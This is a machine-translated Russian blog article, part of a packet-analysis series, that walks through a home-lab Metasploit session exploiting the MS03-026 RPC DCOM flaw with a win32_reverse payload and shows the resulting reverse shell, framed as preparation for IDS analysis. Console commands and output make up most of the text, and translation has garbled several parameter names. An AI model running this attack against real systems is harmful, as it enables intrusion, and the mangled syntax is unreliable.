Инструменты и методология анализа пакетов (часть 3)

Опубликовано: 12 Апреля, 2023

  • Инструменты и методология анализа пакетов (Часть 4)

В наступление с Metasploit!

В ходе последних двух статей мы видели, что существует множество способов сканирования портов, которые можно выполнить с помощью некоторых хорошо известных инструментов. Также мы рассмотрели некоторые из наиболее известных программ, которые аналитики сетевой безопасности используют для защиты своих соответствующих сетей. Все это приводит нас к инструменту, о котором вы, возможно, читали ранее в моей статье; Фреймворк Метасплоит. Благодаря многочисленным эксплойтам, полезной нагрузке и другим расширенным функциям этот инструмент быстро набирает популярность. Он популярен не только среди специалистов по безопасности, но и среди некоторых других представителей компьютерного мира, которые не заботятся о ваших интересах.

Злоумышленники, принявшие этот инструмент из-за его относительной простоты использования и мощных функций, имеют в своем распоряжении мощное оружие. Хотя им должно быть очевидно, что в каждый эксплойт во фреймворке встроена готовая сигнатура обнаружения вторжений. Когда этот инструмент был разработан, его создатели, HDM и Spumpm, были достаточно этичны, чтобы вставить сигнатуру ascii, вокруг которой поставщики средств обнаружения вторжений могли бы легко создать сигнатуру. Таким образом, этот инструмент легко обнаружить, если его увидит IDS. В этой статье будет показано несколько примеров этой подписи ascii.

Чтобы лучше понять, как ваши сети могут быть скомпрометированы, мы атакуем компьютер в моей домашней лаборатории. Различные атаки будут показаны как удачные, так и неудачные. Также будет показано использование синтаксиса для одной из атак. Научиться пользоваться этим инструментом относительно легко. Нужно также помнить, что способов компрометации компьютера не так много. Подавляющее большинство из них продолжают развиваться вокруг протоколов прикладного уровня, таких как HTTP и FTP. Это связано с тем, что эти протоколы должны быть доступны через брандмауэр, чтобы их можно было использовать. Было бы трудно настроить протокол, используемый операционной системой, чтобы он работал надежно, если он не прослушивает входящие соединения. Другими словами, вы не можете нацелиться на то, что не слушает.

Кто-нибудь слушает?

Все следующие примеры, которые мы будем использовать, имеют прослушивающие сокеты. Этими службами будут RPC, LSASS и HTTP. Мы также будем использовать некоторые эксплойты, которые преднамеренно не будут работать, потому что нет никакой службы, которую можно было бы использовать. Таким образом, мы сможем увидеть на уровне пакетов, как это выглядит. Важно распознать не только успешную попытку вторжения, но и неудачную. Имея это в виду, давайте настроим наш первый эксплойт через Metasploit. Если вы читали некоторые из моих предыдущих статей, то понимаете, что Metasploit можно использовать как в win32, так и в linux. Я покажу последовательность действий, выполненных для настройки Metasploit для первого эксплойта, чтобы все, что вам нужно было сделать, это эмулировать его для остальных эксплойтов. Подробные инструкции по использованию этой программы см. ниже.

[электронная почта защищена]:~/framework-2.2 >./msfconsole

__..__..__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ __\__ / ___/\____ | | / _ | \__
| ГГ ___/| | / __ \_\___ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
/ / v2.2 / / |__|
+ — —=[ msfconsole v2.2 [33 эксплойта — 33 полезной нагрузки]




мсф >

((Выше указано, как вы вызываете msfconsole в каталоге фреймворка))

msf > показать эксплойты

Загруженные эксплойты Metasploit Framework
=====================================

Кредиты Кредиты платформы Metasploit
afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
apache_chunked_win32 Фрагментированное кодирование Apache Win32
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec Выполнение команды демона DistCC
exchange2000_xexch50 Exchange 2000 MS03-46 Переполнение кучи
frontpage_fp30reg_chunked Начальная страница fp30reg.dll фрагментированное кодирование
ia_webmail IA WebMail 3.x Переполнение буфера
icecast_header Icecast (<= 2.0.1) Перезапись заголовка (win32)
iis50_nsiislog_post Переполнение POST IIS 5.0 nsiislog.dll
iis50_printer_overflow Переполнение буфера принтера IIS 5.0
iis50_webdav_ntdll Переполнение IIS 5.0 WebDAV ntdll.dll

((введя вышеприведенное «показать эксплойты», вы получите список доступных эксплойтов, это лишь неполный список, так как я вырезал большую часть для краткости))

msf> используйте msrpc_dcom_ms03_026
мсф msrpc_dcom_ms03_026 >

((после того, как вы решили, какой эксплойт использовать, введите «использовать», а затем фактическое имя эксплойта, которое выглядит так же, как в приведенном выше примере))

msf msrpc_dcom_ms03_026 > показать параметры

Параметры использования
===============

Эксплойт: Имя По умолчанию Описание
——— —— ——- ——————
требуется РОСТ Целевой адрес
требуется ОТЧЕТ 135 Целевой порт

Цель: Windows NT SP6/2K/XP/2K3 ВСЕ

мсф msrpc_dcom_ms03_026 >

((введя команду «show options», вы получите неполный список параметров, которые вам нужно будет заполнить, например, LHOST, то есть: localhost или IP-адрес атакующего компьютера и RHOST IP-адрес компьютера-жертвы))

msf msrpc_dcom_ms03_026 > установить RHOST 192.168.1.101
ЖАРКОЕ -> 192.168.1.101
msf msrpc_dcom_ms03_026 > установить LHOST 192.168.1.102
ЛХОСТ -> 192.168.1.102
мсф msrpc_dcom_ms03_026 >



((теперь вы установите параметры, как показано выше))

msf msrpc_dcom_ms03_026 > показать полезные нагрузки

Используемые полезные нагрузки Metasploit Framework
=====================================

win32_adduser Windows Выполнить сетевой пользователь /ADD
win32_bind Оболочка привязки Windows
win32_bind_dllinject Внедрение Windows Bind DLL
win32_bind_stg Оболочка поэтапной привязки Windows
win32_bind_stg_upexec Загрузка/выполнение поэтапной привязки Windows
win32_bind_vncinject Внедрение DLL сервера Windows Bind VNC
win32_exec Выполнить команду Windows
win32_reverse Обратная оболочка Windows
win32_reverse_dllвнедрить Обратное внедрение DLL в Windows
win32_reverse_stg Поэтапная обратная оболочка Windows
win32_reverse_stg_ie Windows Reverse InlineEgg Stager
win32_reverse_stg_upexec Поэтапная обратная загрузка/выполнение Windows
win32_reverse_vncinject Инъекция DLL обратного VNC-сервера Windows

((введя «показать полезные нагрузки», вы получите обширный список доступных полезных нагрузок для атаки на эксплойт, и именно здесь Metasploit действительно выделяется среди других подобных инструментов))

msf msrpc_dcom_ms03_026 > установить ПЛАТЕЖНУЮ НАГРУЗКУ win32_reverse
ПОЛЕЗНАЯ НАГРУЗКА -> win32_reverse
мсф msrpc_dcom_ms03_026(win32_reverse) >

((после того, как вы выбрали тип полезной нагрузки, введите его, как показано выше))

msf msrpc_dcom_ms03_026(win32_reverse) > показать параметры
Параметры эксплойта и полезной нагрузки
============================

Эксплойт: Имя По умолчанию Описание
——— —— ————- ——————
требуется РОСТ 192.168.1.101 Целевой адрес
требуется ОТЧЕТ 135 Целевой порт
Полезная нагрузка: Имя По умолчанию Описание
——— ——— ————- ——————————————
по желанию ВЫХОД сех Техника выхода: «процесс», «нить», «сех»
требуется ЛХОСТ 192.168.1.102 Локальный адрес для получения соединения
требуется ЛПОРТ 4321 Локальный порт для получения соединения

Цель: Windows NT SP6/2K/XP/2K3 ВСЕ

мсф msrpc_dcom_ms03_026(win32_reverse) >

((когда вы снова наберете «показать параметры», вы увидите, что все они были заполнены необходимой информацией))

msf msrpc_dcom_ms03_026(win32_reverse) > установить ЦЕЛЬ 0
ЦЕЛЬ -> 0

((последнее, что я делаю, это устанавливаю целевое поле, которое охватывает почти все операционные системы win32, как показано выше))

msf msrpc_dcom_ms03_026(win32_reverse) > эксплойт
[*] Запуск обратного обработчика.
[*] Подключен к REMACT с идентификатором группы 0x80b3
[*] Есть соединение с 192.168.1.101:1028
Microsoft Windows 2000 [версия 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:WINNTsystem32>



((наконец, как показано выше, я набираю «эксплойт», чтобы запустить сам факт, и я действительно получаю приглашение обратной оболочки, как показано выше))

Это показало нам, что такой мощный инструмент, как Metasploit Framework, относительно прост в использовании. Это действительно помогает нам понять, как выглядят определенные эксплойты на уровне пакетов. Я уже говорил это раньше и повторю еще раз, вам всегда нужно обращаться к самим пакетам, чтобы убедиться, что произошел взлом системы.

В связи с этим вам будет очень полезно, если вы сможете распознать эксплойт таким, какой он есть. Нет лучшего способа сделать это, чем сделать что-то самому в лабораторных условиях. Я пошел дальше и запустил несколько других эксплойтов для последней части этой серии статей. В следующей и последней части мы будем использовать некоторые из инструментов, которые мы посетили ранее. Эти инструменты помогут нам исследовать двоичный журнал, который я сгенерирую для вас. Поскольку в последней части этой серии статей мы будем анализировать двоичный файл журнала с помощью snort и snortsnarf. Это даст нам дружественный HTML-файл для исследования вывода snort. До тех пор!

  • Инструменты и методология анализа пакетов (Часть 4)


Кибер-безопасность

РЕКОМЕНДУЕМЫЕ СТАТЬИ

Информационная безопасность и системная IT-интеграция
27 Июня, 2024
Брандмауэр в ИТ-системе
15 Апреля, 2023
Почему одного брандмауэра недостаточно? Что такое IDS и почему их стоит иметь?
15 Апреля, 2023
Новые функции безопасности Internet Explorer 6.0 с браузером .NET Server по умолчанию
15 Апреля, 2023
Виртуальная частная сеть
15 Апреля, 2023
Microsoft ISA Server, часть II — функции брандмауэра, правила политики публикации
15 Апреля, 2023
Стратегия Microsoft в отношении .NET
15 Апреля, 2023
SSH
15 Апреля, 2023